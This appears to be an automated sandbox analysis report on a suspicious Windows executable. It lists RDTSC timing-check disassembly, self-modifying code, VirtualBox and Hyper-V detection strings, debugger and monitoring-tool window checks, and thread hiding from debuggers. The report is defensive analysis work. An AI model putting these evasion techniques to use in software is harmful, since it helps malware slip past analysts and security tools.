Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0968 second address: 71A0987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCBA141C934h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0987 second address: 71A098D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0B0A second address: 71B0B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007FCBA141C92Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0B2D second address: 71B0B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov ax, di 0x0000000b mov bh, D4h 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FCBA141FCADh 0x00000019 sbb ax, 0136h 0x0000001e jmp 00007FCBA141FCB1h 0x00000023 popfd 0x00000024 mov dh, al 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0B68 second address: 71B0B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0B6E second address: 71B0B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0B72 second address: 71B0BA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C934h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCBA141C937h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0BA8 second address: 71B0BF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, bx 0x00000012 pushfd 0x00000013 jmp 00007FCBA141FCAFh 0x00000018 jmp 00007FCBA141FCB3h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7220616 second address: 7220650 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 jmp 00007FCBA141C937h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7220650 second address: 7220656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7220656 second address: 722065A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 722065A second address: 72206AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FCBA141FCB7h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov edi, eax 0x00000013 jmp 00007FCBA141FCB0h 0x00000018 popad 0x00000019 mov dl, byte ptr [ebp+14h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FCBA141FCB7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 72206AC second address: 72206B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 72206B2 second address: 72206B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 72206B6 second address: 7220710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushad 0x0000000f call 00007FCBA141C934h 0x00000014 movzx eax, dx 0x00000017 pop edi 0x00000018 pushfd 0x00000019 jmp 00007FCBA141C92Ch 0x0000001e jmp 00007FCBA141C935h 0x00000023 popfd 0x00000024 popad 0x00000025 and dl, 00000007h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7220710 second address: 7220714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7220714 second address: 7220718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7220718 second address: 722071E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 722071E second address: 7220744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C932h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCBA141C92Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7220744 second address: 722074A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 722074A second address: 722077B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FCC117323BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCBA141C937h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 722077B second address: 7220781 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7220781 second address: 72207B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 00000000h 0x0000000d pushad 0x0000000e mov ax, 3E49h 0x00000012 pushad 0x00000013 movzx ecx, bx 0x00000016 mov eax, ebx 0x00000018 popad 0x00000019 popad 0x0000001a inc ecx 0x0000001b jmp 00007FCBA141C933h 0x00000020 shr eax, 1 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 72207B6 second address: 72207BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7200E3A second address: 7200E68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 jmp 00007FCBA141C92Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCBA141C937h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7200E68 second address: 7200E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7200E6E second address: 7200E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7200E72 second address: 7200E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBA141FCB8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7200E97 second address: 7200E9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7200E9D second address: 7200EE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop ecx 0x0000000f pushfd 0x00000010 jmp 00007FCBA141FCB9h 0x00000015 xor eax, 0AD40F76h 0x0000001b jmp 00007FCBA141FCB1h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7200EE8 second address: 7200EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7200EEE second address: 7200EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7200EF2 second address: 7200F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FCBA141C92Fh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FCBA141C930h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7200F20 second address: 7200F2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 72104E1 second address: 72104E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 72104E7 second address: 72104EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 72104EB second address: 72105D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bl, al 0x0000000f mov bx, 8F2Ch 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007FCBA141C92Bh 0x0000001b xchg eax, ebx 0x0000001c jmp 00007FCBA141C936h 0x00000021 push eax 0x00000022 jmp 00007FCBA141C92Bh 0x00000027 xchg eax, ebx 0x00000028 pushad 0x00000029 mov ax, DFCBh 0x0000002d movzx esi, dx 0x00000030 popad 0x00000031 push ebp 0x00000032 jmp 00007FCBA141C938h 0x00000037 mov dword ptr [esp], esi 0x0000003a jmp 00007FCBA141C930h 0x0000003f mov esi, dword ptr [ebp+08h] 0x00000042 jmp 00007FCBA141C930h 0x00000047 sub ecx, ecx 0x00000049 pushad 0x0000004a call 00007FCBA141C937h 0x0000004f mov dx, si 0x00000052 pop eax 0x00000053 push edx 0x00000054 pushfd 0x00000055 jmp 00007FCBA141C930h 0x0000005a sub ah, FFFFFFF8h 0x0000005d jmp 00007FCBA141C92Bh 0x00000062 popfd 0x00000063 pop eax 0x00000064 popad 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FCBA141C92Eh 0x0000006f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 72105D8 second address: 72105DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 72105DE second address: 7210647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c jmp 00007FCBA141C930h 0x00000011 mov eax, 00000001h 0x00000016 jmp 00007FCBA141C930h 0x0000001b lock cmpxchg dword ptr [esi], ecx 0x0000001f jmp 00007FCBA141C930h 0x00000024 mov ecx, eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FCBA141C937h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D023E second address: 71D0244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D0244 second address: 71D0248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D0248 second address: 71D027C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dl, ch 0x0000000c pushfd 0x0000000d jmp 00007FCBA141FCABh 0x00000012 jmp 00007FCBA141FCB3h 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d movzx esi, di 0x00000020 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D027C second address: 71D02F3 instructions: 0x00000000 rdtsc 0x00000002 mov di, C452h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FCBA141C933h 0x0000000e jmp 00007FCBA141C933h 0x00000013 popfd 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 jmp 00007FCBA141C934h 0x0000001d mov ecx, 37956161h 0x00000022 popad 0x00000023 mov eax, dword ptr [ebp+08h] 0x00000026 jmp 00007FCBA141C92Ch 0x0000002b and dword ptr [eax], 00000000h 0x0000002e jmp 00007FCBA141C930h 0x00000033 pop ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D02F3 second address: 71D02F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D02F7 second address: 71D02FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D002E second address: 71D0034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D0034 second address: 71D0095 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FCBA141C92Ch 0x00000013 and eax, 2EA976C8h 0x00000019 jmp 00007FCBA141C92Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FCBA141C938h 0x00000025 or esi, 14C7F928h 0x0000002b jmp 00007FCBA141C92Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D0095 second address: 71D00DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA141FCAFh 0x00000009 sub al, 0000006Eh 0x0000000c jmp 00007FCBA141FCB9h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FCBA141FCADh 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D00DE second address: 71D00E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D00E2 second address: 71D00E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D00E6 second address: 71D00EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D00EC second address: 71D00F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D00F2 second address: 71D00F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71D00F6 second address: 71D00FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 716012B second address: 7160130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7160130 second address: 716017B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FCBA141FCB1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FCBA141FCAEh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov bx, cx 0x0000001b mov ah, 8Bh 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov bh, ah 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 716017B second address: 7160180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSpecial instruction interceptor: First address: B31976 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSpecial instruction interceptor: First address: B31882 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSpecial instruction interceptor: First address: CF6992 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSpecial instruction interceptor: First address: CD89E8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSpecial instruction interceptor: First address: B318DF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSpecial instruction interceptor: First address: D5D571 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_00639980 rdtsc 0_2_00639980
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0045255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0045255D
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_004529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004529FF
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0045255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0045255D
Source: EwhnoHx0n5.exe, EwhnoHx0n5.exe, 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: EwhnoHx0n5.exeBinary or memory string: Hyper-V RAW
Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: EwhnoHx0n5.exe, 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: EwhnoHx0n5.exe, 00000000.00000003.1394830466.0000000001812000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: EwhnoHx0n5.exe, 00000000.00000003.1501495234.000000000183D000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1513086082.000000000187F000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1502012683.000000000187E000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1501735272.0000000001862000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1501782053.000000000186F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: EwhnoHx0n5.exe, 00000000.00000003.1398157440.0000000006A21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeFile opened: NTICE
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeFile opened: SICE
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_00639980 rdtsc 0_2_00639980
Source: EwhnoHx0n5.exe, EwhnoHx0n5.exe, 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: K9Program Manager
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
